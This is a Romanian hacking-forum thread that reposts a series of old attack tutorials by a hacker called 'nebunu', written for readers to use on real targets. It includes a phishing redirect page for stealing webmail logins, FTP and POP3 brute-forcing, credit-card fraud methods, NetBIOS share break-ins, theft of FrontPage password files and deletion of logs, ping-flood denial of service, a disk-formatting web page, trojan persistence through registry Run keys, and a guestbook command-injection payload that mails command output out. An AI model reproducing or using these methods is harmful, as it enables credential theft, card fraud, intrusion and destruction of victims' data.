Bine ati venit pe HackTeam Forum !
Aici veti gasi o gama larga de metode de hack atat pe Windows cat si pe platforme Linux/Unix , programe in consecinta ,tutoriale .
In acelasi timp aici veti gasi si asistenta help in materie corespunzatoare . Precizam ca tot ce se gaseste pe acest site este doar in scop de dezvoltare iar voi va asumati intreaga raspundere pt actiunile pe care le savarsiti . || SS-TEAM || Va Multumeste pt vizita !
|
Lista Forumurilor Pe Tematici
|
Bine ati venit pe HackTeam Forum ! | Reguli | Inregistrare | Login
POZE BINE ATI VENIT PE HACKTEAM FORUM !
Nu sunteti logat.
|
Nou pe simpatie:
erica_ana_maria pe Simpatie.ro
 | Femeie
22 ani
Bucuresti
cauta Barbat
27 - 67 ani |
|
Salieri
Mafioso
 Din: Sufragerie
Inregistrat: acum 19 ani
Postari: 469
|
|
Va prezint in continuare niste tutoriale facute de un hacker respectat in Romania asta...care cred ca pana la urma a ajuns si el la parnaie...dar nu bag mana in foc pt asta ...
Deci repet: Tutorialele nu sunt gandite de mine.. Tutorialele lui nebunu au fost printre primele materiale informative in legatura cu hacking-ul ... acu cativa ani buni... si mi s-au parut foarte interesante ....
_______________________________________
void()
|
|
| pus acum 18 ani |
|
Salieri
Mafioso
Din: Sufragerie
Inregistrat: acum 19 ani
Postari: 469
|
|
Doar nu va asteptati ca serverul andre.ro sa fie vulnerabil!A fost odata,acum odata cu ultima mea
tentativa si-a intalat firewall.Este vorba de serverul gazda al lui andre.ro,dcmhosting.com
sau cam asa ceva.Astazi invatam cum sa furam conturi de mail.
1)Faceti-va o pagina la geocities.com,si folositi username-ul "johnny"
2)cand vi se cere adresa de mail dati adresa voastra
3)pagina aceasta o numiti index.html si o puneti pe domeniul de la
geocities.com pe care tocmai l-ati deschis
4)trimiteti victimei dvs aceasta pagina(care deschide message.htm) si asteptati:
<html><thead><title>titlu</title><head><body>
<script>self.location="numele site-ulul dvs de pe geocities";</script></body></html>
Cand victima deschide pagina este redirectat de functia self.location catre site-ul
dumneavoastra si crede ca are de-a face cu un mesaj de eroare.Ca urmare va introduce
ID-ul si parola care va vor parveni prin mail.Binenteles ca sa folositi acest sistem victima
trebuie sa aiba un cont la hotmail.Daca are cont in alta parte schimbati putin pagina index.htm
conform cu serverul de mail.Spre exemplu daca adresa victimei este E-mail trebuie
sa primesc un mesaj de eroare ca venind de la home.ro nu de la homail cum este prezentat in exemplu.
Priviti sursa paginii message.htm si anume portiunea <FORM ACTION=".....">si veti vedea ca fisierul
mail.pl avand ca parametru userul dvs de la geocities(i-am zis johnny dar puteti sa-l schimbati)
va trimite voua prin mail ID-ul,parola si IP-ul fraierului.
_______________________________________
void()
|
|
| pus acum 18 ani |
|
Salieri
Mafioso
Din: Sufragerie
Inregistrat: acum 19 ani
Postari: 469
|
|
Se pot obtine incredibil de multe informatii despre un server cu ajutorul tehnicii numite "port scanning".Voi prezenta in continuare principalele porturi care ofera acces la informatia de care avem nevoie.Dar ce este un port?Pe intelesul tuturor un port este ca o "conducta" prin care circula pachetele de date.Cu ajutorul acestora se realizeaza conexiunea intre doua computere dupa cum este prezentat in tabelul de mai jos:
PORT SERVICI
80,8000,8080 se ocupa de gestiunea informatiei privtoare la paginile web
21 serviciu ftp
23 serviciu telnet
25 serviciu de transmitere a mesajelor de mail
110 serviciu de primire a mesajelor de mail
139 optiunea "file and print sharing" pentru windows
Cand unul dintre aceste porturi este deschis inseamna ca pe computerul respectiv este instalat serviciul corespunzator.Daca in urma scanarii rezulta ca portul 139 este deschis atunci computerul respectiv este ca si hackerit(vezi tutorialele precedente).Daca portul 25 este seschis atunci putem trimite meaje false de mail(vezi tuitorialul sendmail).Ne conectam cu urmatoarea comnda "telnet 10.45.6.6 25" unde 10.45.6.6 este adresa de IP a serverului.Nu voi insista asupra notiunii de daemon,tot ce trebuie sa stiti este ca reprezinta un program care ruleaza pe portul respectiv.Ideea este ca atunci cand vedeti un port deschis sa va conectati sa vedeti ce serviciu ruleaza pe el.
Voi prezenta in continuare unealta mea favorita de scanare a porturilor si anume FScan.exe.Il puteti lua de la tastand in motorul de cautare ce apare "Fscan" sau "scan".Optiunile sunt urmatoarele:
-?/-h - shows this help text
-a - append to output file (used in conjunction with -o option)
-b - get port banners
-c - timeout for connection attempts (ms)
-d - delay between scans (ms)
-e - resolve IP addresses to hostnames
-f - read IPs from file (compatible with output from -o)
-i - bind to given local port
-l - port list file - enclose name in quotes if it contains spaces
-n - no port scanning - only pinging (unless you use -q)
-o - output file - enclose name in quotes if it contains spaces
-p - TCP port(s) to scan (a comma separated list of ports/ranges)
-q - quiet mode, do not ping host before scan
-r - randomize port order
-t - timeout for pings (ms)
-u - UDP port(s) to scan (a comma separated list of ports/ranges)
-v - verbose mode
-z - maximum simultaneous threads to use for scanning
O traducere cred ca nu mai are rost asa ca o sa dau cateva exemple de folosire:
Example #1:
Scaneaza serverul de adresa 10.0.2.2 pentru toate porturile de la 1 la 200.
FScan -p 1-200 10.0.2.2
-------------------
Example #2:
Scaneaza serverele de IP range de la 10.0.2.2 la 10.0.2.254 pentru toate porturile de la 1 la
65535 depunand rezultatele in out.txt
FScan -p 1-65535 10.0.2.2-254 -o out.txt
-------------------
Example #3:
Scaneaza serverele de IP range de la 10.0.2.2 la 10.0.2.20 pe porturile 80, 81, 88, 8000 si
8080 fara ca sa adauge inregistrari in out.txt
FScan -aqp 80,81,88,8000,8080 -u 31337 10.0.2.2-20 -o out.txt
Celelalte optiuni le invatati si singuri dupa ce incarcati programul de la
Apropo, o comanda foarte utila este:
FScan -p 1-140 4.35.37.1-255
Aflam daca serverele ruleaza sub Unix sau Windows si daca portul 139 in cazul windowsului este deschis.
_______________________________________
void()
|
|
| pus acum 18 ani |
|
Salieri
Mafioso
Din: Sufragerie
Inregistrat: acum 19 ani
Postari: 469
|
|
Se poate afla parola unui server folosind metode mai putin inteligente cum ar fi conectarile repetate. Pentru acest lucru este necesar un program de brute force cracking.Cel mai bun program de acest tip este 'Brutus'. In motorul de cautare tastati 'Brutus' sau 'brute force'.Dar cel mai bine se intelege privind urmatorul exemplu. Sa prsupunem ca serverul are client prima data o conexiune: Deschidem Start/Run si tastam:
open
220
220
220
220
220
connecting to server running WU_FTPD): {introduceti debbbie}
password:********
userid/password incorrect login failed
goodbye
Dupa cum am vazut serverul,chiar daca nu a permis conectarea,a fost destul de amabil incat sa
ne ofere doua informatii de mare inportanta:
username:debbie
tipul de server:WU_FTPD
Ori gasim un exploit pentru wu_ftpd ori incercam un brute force cracking.Programul Brutus ofera doua posibilitati de a ataca un server:folosind un dictionar de parole sau incercand toate combinatiile posibile.Din moment ce stiti username-ul inlocuiti fisierul 'users.dat' care este livrat cu Brutus cu un fisier in care puneti un singur nume si anume 'debbie'.Fisierul astfel creat puteti sa-l denumiti tot 'user.dat'.Tot ce va ramane de facut dupa ce ati facut setarile este sa asteptati. Dupa ce epuizati incercarile cu dictionarul,setati optiunea 'brute force' si selectati optiunile dorite. Ideal ar fi sa stim lungimea parolei sau numarul de caractere din care este alcatuita parola precum si natura acestora.Initial eu obisnuiesc sa fac urmatoarele setari privind parola:
length min:0
length max 10
custom char :0123456789
In felul acesta incerc intai toate combintiile numerice posibile apoi schimb optiunea cu litere:
custom char:abcderftyijop
Aceasta metoda este absolut sigura dar are doua dezavantaje majore:
1)Timpul mare de asteptare (1 ora-cateva luni  depinde de noroc).Pentru cineva care are Net-ul pe Lan nu este o problema(firma sau alta institutie).
2)Ip-ul dvs este inregistrat,asa ca incercati sa folositi un proxy server sau un program
precum 'jammer' care zice-se ca ascunde numarul de telefon.
Voi mai da un exempu de bug in ftp:
open 220
220
220
...
connecting to........):ftp {introduceti un user implicit} passrord:guest
ftp>dir 'tastati dir sa vedeti la ce directoare aveti acces'
Daca vedeti un director numit cgi-bin,cgi-win sau script atunci servrul este hackerit!!! Cautati un exploit adecvat pentru sistemul de operare respectiv(stiti cum sa-l aflati) il puneti pe desktop apoi dati urmatoarea comanda(pres. ca exploitul se numeste expl.exe):
cd cgi-bin(sau ce director gasiti)
put expl.exe
apoi tastati 'quit' ,deschideti browserul si tastati(pres. ca directorul este cgi-bin):
Nu mai ramane altceva decat sa asteptati rezultatul executiei exploitului,caruia bineinteles ai cititi documentatia inainte de a fi folosit.
_______________________________________
void()
|
|
| pus acum 18 ani |
|
Salieri
Mafioso
Din: Sufragerie
Inregistrat: acum 19 ani
Postari: 469
|
|
Deoarece am primit multe mail-uri privitoare la cartile de credit m-am decis sa scriu un tutorial privitor la acestea.NU SUNT RASPUNZATOR DE ACTIUNILE DUMNEAVOASTRA DUPA CE CITITI ACEST MATERIAL.AM INCLUS ACEST SUBIECT NUMAI PENTRU A SATISFACE CURIOZITATEA UNORA DINTRE VOI PRECUM SI CU SCOP INFORMATIV. Bineinteles teoria exploiturilor functioneaza de minune: 1)SUSTRAGEREA NUMARULUI CARDULUI DIN CALCULATORUL ALTEI PERSOANE. Este cea mai utilizata metoda si functioneaza asupra calculatoarelor cu windows instalat.Exploitul este scanarea pe portul 139 a acelor calculatoare care au optiunea "file ad print sharing" activa.Tot ce are de facut un hacker este sa scaneze IP-urile pe o anumita raza de exemplu 4.37.1.1-4.38.1.255 iar apoi sa urmeze instructiunile din tutorialul pe care l-am dedicat hackeririi windowsului 2)FOLOSIREA UNUI PROGRAM DE CARDING Programele de acest tip extrapoleaza un numar valabil si generaza alte carti de credit valabile sau pur si simplu genereaza numere de carti de credit.Cele mai utilizate tipuri de carduri sunt:mastercard,visa,american express.Un program interesant este Card Wizard.Mod de folosire: Deschideti un site porno cum ar fi ,cautati o pagina care contine posibilitatea de a introduce un numar de card,deschideti Card Wizard-ul odata cu pagina si incercati.Cit mai multe incercari cit mai multe sanse - 3)FORUM EXPLOIT,ECRANE FALSE,MAIL EXPLOIT Guestbook-ul de la si orice guestbook in general poate fifolosit in astfel de scopuri. -afiliati-va unui astfel de guestbook -studiati foarte bine formularul -modificati acest formular -redirectati informatia introdusa spre alt site pentru a nu fi vazut -initial modificati formularul prezentindu-l ca fiind formularul unui site comercial....... *Cumparati un domeniu in care sa aveti acces la cgi-bin sau cgi-win construiti-va un fals site comercial care sa para veridic apoi scrieti un script care va pune numarul cartii de credit introduse de lamer intr-un fisier text. *Un exemplu sugestiv de ecran care poate fi falsificat este cel de la yahoo. Il puteti incarca si modifica.Modificati de fapt sursa paginii,adica numai partea de
Vedeti sursa programului meu de mailbombing?Modificati-l incat sa trimita prin posta de mail numere de credit in loc de mesaje. *Urmariti cu ajutorul unui program de detectare informatia transmisa de pe un site comercial apoi puteti ataca calculatarele care primesc aceasta informatie. Ca sa puteti vedea modul de transmitere a informatiei de pe un calculator pe altul folositi comanda : c:/windows>tracert si veti vedea toate calculatoarele prin care trece semnalul inainte de a ajunge pe serverul andre.ro 4)EXPLOITURI IN PROGRAMELE DE CARDING Deschideti un site comercial,introduceti un numar fals apoi urmariti cu atentie adresa din browser ,un exemplu ar fi apoi gasiti o modalitate de a fenta autentificarea.Spre exemplu am dezasamblat programul card32.exe si nu mica mi-a fost mirarea cand am descoperit o parola implicita "whoami". Sfatul meu este sa va luati programul w32dasm ,sa dezasamblati programele care va intereseaza si sa le intelegeti structura interna.Am dat de fapt un exemplu in tutorialul in care am crack-uit notepad.exe si winzip.exe. Daca dezasamblati troianul SubSeven veti descoperi o parola in limba romana care este pi.. a . mail la Chiar daca nu raspund din lipsa acuta de timp va asigur ca le citesc pe toate!
_______________________________________
void()
|
|
| pus acum 18 ani |
|
Salieri
Mafioso
Din: Sufragerie
Inregistrat: acum 19 ani
Postari: 469
|
|
Ne vom ocupa in acest tutorial de conturile dial-up.
Cerinte: programul Fscan pe care-l puteti lua de pe packetstorm.securify.com
Continut:
1)Strangerea de informatii(partea cea mai grea de fapt)
2)Atacul propriu zis.
3)contul dial-up in registrii windows-ului
1)Majoritatea firmelor distribuitoare de Internet de la noi din tara prezinta o mare vulnerabilitate,aceea de a asigna numele utilizatorului folosit pentru conexiunea la internet,unei adrese de mail.Spre exemplu ISP-ul meu este
firma ISP(doar un exemplu) iar userul meu folosit pentru conectare este "nebunu".Atunci adresa mea de mail este sau .ro.Deci daca aflu parola de la mail aflu si parola folosita pentru dial-up.
Stiti cred din tutorialele anterioare ca serverul pe care se afla mesajele primite are portul 110 deschis.iar cel folosit la transmiterea mesajelor are portul 25 deschis.Pe noi ne intereseaza portul 110.Dar cum aflam care este
adresa serverului pe care se afla mesajele?Simplu.Intai aflam IP-ul providerului de internet,tastand:
tracert -j
Presupunem ca IP-ul gasit este 154.14.14.25.Pentru afla care este serverul de receptie a mesajelor scanam IP-urile pe o raza care sa incadreze ultimul numar al IP-ului providerului,in cazul nostru pentru portul 110.Dar nu
strica sa stim daca are si portul 79 deschis.....
fscan -vbp 79,110 154.14.14.1-254
Presupunem ca IP-ul gasit este 154.14.14.144.Ca se ne convingem ca intr-adevar
este serverul cautat,lansam din Start/Run urmatoarea comanda:
telnet 154.14.14.144 110
Dupa ce ne conectam tastam
user blahbla
si vom primi ceva de genul +OK apoi tastam
pass blabla
si vom primi un mesaj de eroare.Ne-am convins ca acesta este serverul!.
Daca cumva aveti un cont la firma respectiva puteti sa va conectati asa:
telnet server_de primire 110
user userul_tau
pass parola_ta
si iti poti citi mail-ul folosind telnetul.
2)Daca stim userul mai trebuie sa aflam parola pentru a intra in posesia contului.Pentru asta folosim un
program de brute force(Brutus.Unsecure,WWWhack etc).Le gasiti folosind motorul de cautare.In general lungimea parolei trebuie sa depaseasca 5 caractere,asa ca nu merge cu optiunea "brute force".Construiti-va un dictionar de parole care sa corespunda unui alt dictionar care sa cuprinda userii.Intai incercati daca userul si parola nu sunt identice,am intalnit
cazuri din astea.Ca sa aflati direct user-ul intrati pe un chat,si folositi optiunea "finger" a programului mIRC.
Posibilitatile sunt nesfarsite,incercati... .
3)Evident ca tot ce tastam ramane stocat in registrii windowsului.Pentru a afla datele despre conexiune deschidem meniul Start optiunea Run si tastam Regedit.Datele despre conexiune se afla la
H_KEY_CURRENT_USER/REMOTE ACCESS/PROFILE/"numele conexiunii"
Puteti afla astel userul dar parola este in binar si poate fi convertita usor,o sa scriu curand un tutorial despre asta.
*Inteleg ca va place ce cititi dar va rog sa mai si votati pentru ca ma simt prost de tot cand sunt la concurenta cu niste site-uri porno tocmai pe locul 127. *
Daca aveti ceva interesant de semnalat,propuneri sugestii sau critici ,trimiteti un email la
_______________________________________
void()
|
|
| pus acum 18 ani |
|
Salieri
Mafioso
Din: Sufragerie
Inregistrat: acum 19 ani
Postari: 469
|
|
Am primit multe mesaje de la anumite persoane care considerau ca nu am fost suficient
de explicit in legatura cu informatiile despre ftp si telnet.
Poate ca au dreptate,dar acesta este ultimul tutorial despre acest subiect.
Cu ajutorul programului ftp nu se pot lansa comenzi pe serverul gazda,dar
se pot afla comenzile disponibile pe server care pot fi executate cu telnetul.
Tastez ftp
open
username:nebunu
password:*******************
user nebunu logged in
tastez "remotehelp" la promptul ftp ce apare si voi primi ca raspuns o serie de comenzi
ce pot fi executate pe computerul gazda
una dintre comenzile cele mai folositoare este "syst"
Copiez cu grija toate comenzile disponibile iar apoi tastez "quit"
Lansez apoi o sesiune telnet pe portul corespunzator ftp-ului si anume 21
Tastez telnet nebunu.home.ro 21 in submeniul run al meniului start
Voi primi un mesaj de intampinare din partea daemonului care ruleaza pe portul 21.
tastez
user nebunu
pass ***************(parola mea)
iar apoi pot da comenzile necesare printre care si "syst"
Tastez "quit"
Informatii folositoare pot obtine conectandu-ma pe portul 80 care automat este deschis
telnet nebunu.home.ro 80
tastez urmatoarele comenziputeti sa le incercati)
get /http/1.1 (pentru a vedea sursa paginii principale)
put fisier.htm /http/1.1 (pentru a incarca ceva pe server,in cazul asta nu merge)
Se poate tasta orice comanda cum ar fi "blablabla" urmata de doua apasari succesive
rapide ale tastei Enter,iar raspunsul va fi
bad request
server:numele sistemului de operare
Dar de ce trebuie sa cunosc sistemul de operare al gazdei?.Aceasta este cea mai obisnuita
intrebare care mi se pune si eu o gasesc fireasca.
Raspuns:Pentru a putea plasa un exploit trebuie sa cunosc sistemul de operare pentru care
acesta ruleaza la parametrii normali.Un exploit scris in limbaj de comanda Linux(bash)
(asemanator cu fisierele bat din DOS) evident nu poate rula pe un server care foloseste
o versiune de Windows(probabil NT).O alta explicatieaca cunoastem sistemul de operare
respectiv putem sa gasim un bug in CGI(common gateway interface).De exemplu pentru un server
pe care ruleaza MultiHTML 2.0 un bug ar fi tastarea in browser a urmatoarei comenzi:
Aceasta are ca rezultat obtinerea fisierului cu parola mult ravnita.Sa studiem putin comanda.
multihtml.pl este un program scris in Perl a carei executie are ca rezultat redarea fisierului
cerut cu extensia htm.Dar ce se intampla daca cer alt fisier?.Parametrul pe care-l dau
progamului este /etc/passwd(fisierul cu parola).%00htm inseamna ca nu are extensia htm.
%00 este caracterul NULL in limbajul Perl.Exemplele ar putea continua la nesfarsit dar
un hacker trebuie sa invate si singur nu numai sa copieze de la altii.
Sunt o multime de comenzi unix pe care le puteti incerca daca va faceti cont la nether.net.
Am primit de asemenea foarte multe intrebari despre mailbombing.
Mailbombingul este o tehnica folosita de lameri pentru a va umple casuta postala cu mesaje
insultatoare si repetate.Am inclus in pagina mea un program de mailbombing scris in javascript
cu ajutorul caruia puteti trimite 1000000 de mesaje in casuta postala a cuiva.
Acest program este inclus doar pentru a vedea cum functioneaza,eventual il puteti incerca
pe casuta dvs postala dar daca il folositi pe casuta postala a altcuiva,adresa dvs de mail
este vizibila si va puteti pierde contul de internet deoarece mailbombingul este ilegal.
program de mailbombing
De asemenea nu prea se stie cum se executa un exploit pe un calculator gazda.
Raspuns:fie cu ajutorul telnetului dupa ce a fost instalat cu ajutorul ftp-ului
fie cu ajutorul unui client ftp for windows care permite lansarea de aplicatii pe
calculatorul gazda.
Deoarece nu prea raspund la mail-uri,voi introduce cat de curand un forum de discutii
in pagina mea,este posibil cand cititi aceste randuri sa-l fi introdus deja.
_______________________________________
void()
|
|
| pus acum 18 ani |
|
Salieri
Mafioso
Din: Sufragerie
Inregistrat: acum 19 ani
Postari: 469
|
|
Dupa ce cititi acest exemplu parcurgeti apoi alt exemplu de hack
si veti capata o alta viziune asupra folosirii browserului web.
ATENTIE!!!!Inainte sa folositi tehnicile prezentate asigurati-va ca aveti un program care
este capabil sa va ascunda IP-ul sau un applet care face acelasi lucru!Incercati la cyberarmy.com
Gata cu vrajeala.LA ATAAC!!!! Cel mai bun scanator de porturi pe care il folosesc si eu poate fi luat deAICI.
Acesta este un exemplu practic care sa exemplifice teoria descrisa anterior.Urmariti cu atentie:
Tinta noastra de astazi este un server numit blabla.com.
Acest server trebuie sa fie un server care gazduieste site-uri pornografice ilegale,fiind ilegal
nu va poate actiona in judecata.FOLOSIREA ACESTOR TEHNICI ASUPRA SERVERELOR LEGALE CONSTITUIE
INFRACTIUNE SI SE PEDEPSESTE CONFORM LEGII ASA CA NU VA SFATUIESC.TOTUSI NIMENI NU POATE SA MA
OBLIGE SA ATAC UN SERVER ILEGAL MAI ALES DACA CONTINE IMGAINI DE GENUL "KIDDIE PORN"
1)Vizitati site-ul si cititi cu atentie toate informatiile.Sa presupunem ca gasiti o adresa de
email numita .Trebuie sa aflam daca mai sunt si alte site-uri la acest server
Introduceti intr-un motor de cautare host:blabla.com sau link:blabla.com.Toate site-urile
afiliate vor fi listate sau poate nu dar incercati si retineti toate informatiile.
2)Puneti in actiune ftp-ul si va conectati in felul urmator:
open
username:blabla
password:blabla
In mod normal nu ar trebui sa mearga dar incercati!
3)Testati daca exista un server finger prin care puteti lua parola.
Tastati in browser-bin/finger
Daca apre un mesaj de eroare treceti la pasul urmator,tehnica pfh,o tehnica mai veche:
Tastati
In locul lui x puteti pune orice cum ar fi J00 spre exemplu.Daca functioneaza,
fisierul cu parola ar trebui listat in browser,il salvati,si stiti cum il spargeti.
4)Scanati porturile cu ajutorul programului portscan.exe si daca exista un port liber
conectati-va cu telnetul:
hostname:blabla.com
port:-----(urmeaza explicatii)
termtype:vt100
Porturile au o semnificatie deosebita , 25,13,23 pentru conexiuni obisnuite
79,80 pentru acces fara parola la sistem si la paginile web.
Daca portul 21 este liber serverul are serviciu ftp,daca 23 este liber folositi telnetul.
5)va puneti in functiune contul dvs de la nether.com si deoarece puteti lansa comenzi
unix tastati "whois blabla.com" iar apoi "finger blabla.com" si cititi cu atentie
toate informatiile prezentate.
6)Trimiteti-i o adresa de mail falsa din partea isp-ului sau si spuneti-i ca se reactualizeaza
baza de date si aveti nevoie de user si password.
Nu cred ca o sa puna botu'
7)Incercati sa obtineti un shell account la blabla.com pentru a putea plasa un exploit.
8)Nu merge NIMIC!!!.Totusi daca sunteti deosebit de suparat pe administrator,puteti
bloca conexiunea acestuia.In directorul c:/windows folositi utilitarul ping.
Tastati pinf-f blabla.com si asteptati...pentru a opri folositi combinatia CTRL+C.
Aceasta o puteti folosi impotriva unui utilizator obisnuit.
Sa zicem ca ip-ul unui prieten este 145.147.258.368.
Folositi comanda ping -f 145.147.258.369 ,Daca nu are un firewall,legatura sa va fi intrerupta.
Daca faceti rost de un fisier cu parola care in locul unde ar trebui sa fie parola
se gasesc niste semne de tipul *,!,?,|,#,$ sau ceva asemanator,atunci ati dat peste asa numitul
fisier "shadow password" pe care nu-l puteti decripta cu programe de spargere obisnuite.
Aceasta parola se decripteaza foarte greu cu ajutorul unor liste uriase de parole.
Pentru a face rost de aceste liste trebuie sa folositi un motor de cautare in care tastati
"exploit","passwd","password file","unix password",sau ceva asemanator si cititi documentatia.
Cel mai bun motor de cautare se gaseste aici.
Derulati bara de meniuri ,selectati "search",si alegeti al doilea motor din pagina(parca!)
_______________________________________
void()
|
|
| pus acum 18 ani |
|
Salieri
Mafioso
Din: Sufragerie
Inregistrat: acum 19 ani
Postari: 469
|
|
Bine v-am gasit pentru un nou tutorial de hack!Sunt dator sa va explic ceva ce a ramas neexplicat in tutorialele trecute.Pentru ca programele de scanare a optiunii "file and print sharing" sa functioneze trebuie sa aveti aceasta optiune activata si sa aveti instalate protocoalele pentru lucrul in retea.Pentru a intelege mai mult despre netbios tastati in motorul de cautare "netbios" si cititi tutorialele prezentate.As dori acum sa discutam despre pericolele pe care le inplica javascripturile atasate paginilor web,sau trimise prin mail impeuna cu paginile web.Stiati ca datorita unui bug in Internet Explorer5.x v-i se poate formata hardul diect dintr-o pagina web,mai precis dupa ce resetati calculatorul?Am inclus mai jos sursa unei pagini care face acest lucru.
Bineinteles ca nu sunteti asa idioti incat sa o rulati cu comanda "format",schimbati comanda cu una inofensiva cum ar fi "wsh.run('command /c cls',false,6);"
in loc de wsh.run('command /c format/q/autotest/u',false,6);
Incarcati pagina
Modificati putin pagina incarcata punind totul pe o singura linie in Notepad.Ma refer numai la sursa paginii html nu la toata pagina prezentata.ATENTIE!!!.Pagina nu are linkuri valabile deoarece am luat-o de pe net si
oricum programul exe2html nu merge.Spre exemplu comanda
<a href=javascript:for i=1 to 2000{window.open("http://www.nebunu.home.ro/"}>apasa aici</a>
deschide de 2000 ori pagina mea de web blocandu-va astfel conexiunea.
_______________________________________
void()
|
|
| pus acum 18 ani |
|
Salieri
Mafioso
Din: Sufragerie
Inregistrat: acum 19 ani
Postari: 469
|
|
In acest tutorial promit ca voi fi foarte ordonat.Am atatea sa scriu incat nu stiu ce sa scriu mai intai si iese "varza",o provocare pentru inteligenta dumneavoastra.Inainte de a incepe trebuie sa mentionez ceva foarte important.
CA SA HACKERITI CU SUCCES UN SERVER TREBUE SA AVETI ACELASI SISTEM DE OPERARE!!!!!!!
Continut:
1)Hackeriti serverul de la distanta
2)Hackeriti paginile Web gazduite de acesta
3)Infiltrati troieni peun calculator pe care aveti acces(cum ar fi calculatorul scolii).
11)In tutorialul precedent a fost prezentata o mare vulnerabilitate a windowsului si anume optiunea "file and print sharing".Programele necesare sunt nbtstat.exe(il aveti deja),net.exe(probabil il aveti si pe acesta) si nat.exe.Deoarece stiti deja ce face nbtstatul trcecem la celelalte doua programe.In exemplul nostru presupunem ca serverul are IP-ul 123.123.123.123. iar numele este server.com .IP-ul se poate afla cu ajutorul comenzii "tracert -j."Apoi se foloseste comanda "nbtstat -A 123.123.123.123. "Iata rezultatul acestei comenzi:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
STUDENT1 <20> UNIQUE Registered
STUDENT1 <00> UNIQUE Registered
DOMAIN1 <00> GROUP Registered
DOMAIN1 <1C> GROUP Registered
DOMAIN1 <1B> UNIQUE Registered
STUDENT1 <03> UNIQUE Registered
DOMAIN1 <1E> GROUP Registered
DOMAIN1 <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
MAC Address = 00-C0-4F-C4-8C-9D
Student1 este numele computerului.Apoi dupa ce am aflat aceasta informatie tastam:
C:>net view 123.123.123.123
C:>net view \student1
Shared resources at 123.123.123.123
Share name Type Used as Comment
------------------------------------------------------------------------------
NETLOGON Disk Logon server share
Test Disk
The command completed successfully.
Asa aflam daca optiunea "file and print sharing este" activata.Apoi tastam urmatoarea comanda:
C:net use x: \123.123.123.123test
The command completed successfully.
Acum sa accesam noul disc creat si anume X:
C:net use
New connections will be remembered.
Status Local Remote Network
-------------------------------------------------------------------------------
OK X: \123.123.123.123test Microsoft Windows Network
OK \123.123.123.123test Microsoft Windows Network
The command completed successfully.
In mod normal cand gasim un calculator cu "file and print sharing" ni se cere o parola.Aceata parola o putem sparge cu ajutorul programului PQwak.exe.Rulati-l,completati formularul si apoi asteptati.Nu trebuie sa asteptati prea mult.
Acum sa prezentam programul Nat.exe,foarte preferat de hackeri.Iata optiunile acestuia:
NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>
OPTIONS
-o Specifica fisierul in care se vor depune rezultatele scanarii unei "raze" de IP.
-u Specifica fisierul care contine numele de utilizatori(useri)
-p Specifica fisierul care contine parolele(password)
<address>
raza de IP care trebuie scanata.Iata un exempu.
C:nat -o vacuum.txt -u userlist.txt -p passlist.txt 204.73.131.10-204.73.131.30
Chiar daca nu "sparge" parola,totusi gaseste calculatoarele cu "file and print sharing" ceea ce este acelasi lucru pentu ca folosim programul PQwak.
2)Acesta este o lista care contine fisiere importante de pe server in relatie cu discul c:/ adica adresa fizica.
C:InetPubwwwroot <Home>
C:InetPubscripts /Scripts
C:InetPubwwwroot_vti_bin /_vti_bin
C:InetPubwwwroot_vti_bin_vti_adm /_vti_bin/_vti_adm
C:InetPubwwwroot_vti_bin_vti_aut /_vti_bin/_vti_aut
C:InetPubcgi-bin /cgi-bin
C:InetPubwwwrootsrchadm /srchadm
C:WINNTSystem32inetserviisadmin /iisadmin
C:InetPubwwwroot_vti_pvt
C:InetPubwwwrootsamplesSearchQUERYHIT.HTM Internet Information Index Server sample
C:Program FilesMicrosoft FrontPage_vti_bin
C:Program FilesMicrosoft FrontPage_vti_bin_vti_aut
C:Program FilesMicrosoft FrontPage_vti_bin_vti_adm
C:WINNTSystem32inetserviisadminhtmldocsadmin.htm /iisadmin/isadmin
Stiind aceste lucruri putem hackeri serverul via html(adica putem schimba paginile web).Intai trebuie sa testam cu ajutorul telnetului existenta acestor "rute".
c:/windows>telnet 123.123.123.212 80(telnet pe serverul cu adresa 123.123.123.123 pe portul 80) si dam comenzile:
GET /_vti_inf.html -------ne asiguram ca este instalat frontpage
GET /_vti_pvt/service.pwd-------ne asiguram daca exista un fisier cu parola
GET /_vti_pvt/authors.pwd ----numai pentru servere Netscape(contine parola si userul criptate)-folositi "john the ripper"
GET /_vti_pvt/administrators.pwd
GET /_vti_log/author.log -----dupa ce patrundem pe server acest fisier trebuie sters sau schimbat deoarece contine adresa voastra IP
Deschidem Frontpage Explorer sau Frontage Express (pentru Windows 95) ,optiunea OPEN si selectam pagina dorita aflata la distanta http:// (restul completam noi).Puteti incerca asa cu pagina mea,completind in rubrica "location" vi se va cere parola dar Windows NT este foarte vulnerabil.Pagina mea de la home.ro nu se afla gazduita peun server sub Windows,asa ca nu ncercati numic,v-ati putea pierde contul de NET .
3)Un troian este un program cu ajutorul caruia puteti patrunde pe calculatorul altei persoane.Un asemenea program este compus din doua fisiere executabile(server.exe si client.exe.).Server.exe trebuie rulat pe calculatorul fraierului iar cu ajutorul programului client.exe va conectati.Daca aveti acces la un calculator trebuie sa instalati programul astfel incat sa fie rulat la butarea calculatorului.E mai smplu decat sa astepti sa-l ruleze cineva.Voi da doua metode:
"1" Il introduceti in calea de startup.Pentru Windows95/98 calea este c/windows/start menu/programs/startup/server.exe.
"2" Cred ca aceasta metoda este buna pentru orice fel de Windows.Creati fisierul "fisier.reg" in care scrieti secventa urmatoare:
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"nebunu"="server.exe"
apoi il executati.Ca urmare a acestei executii se modifica registrii windowsului.Incercati cu alt program inofensiv cum ar fi notepad.exe.
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"nebunu"="notepad.exe"
ASTEPT MESAJELE DUMNEAVOASTRA PE GUESTBOOK.FITI SIGURI CA LE CITESC.
_______________________________________
void()
|
|
| pus acum 18 ani |
|
Salieri
Mafioso
Din: Sufragerie
Inregistrat: acum 19 ani
Postari: 469
|
|
Am mai gasit un exploit!:
Acest exploit executa comanda unix "ps -ax" si trimite rezultatul la
_MAILTO=oops;ps%20-ax|mail%20 &
_POSTIT=yes&
_NEWONTOP=yes&
_SHOWEMAIL=yes&
_SHOWURL=yes&
_SHOWCOMMENT=yes&
_SHOWFROM=no&
_NAME=bebe2000&
_EMAIL= .&
_URL=http://www.andre.ro&
_COMMENT=few&
_FROM=few
Evident toata comanda de sus trebuie sa fie pe o singura linie in browser!
Baga si tu o comanda adevarata in loc de "px -ax" (format) nu stiu daca merge sub unix.
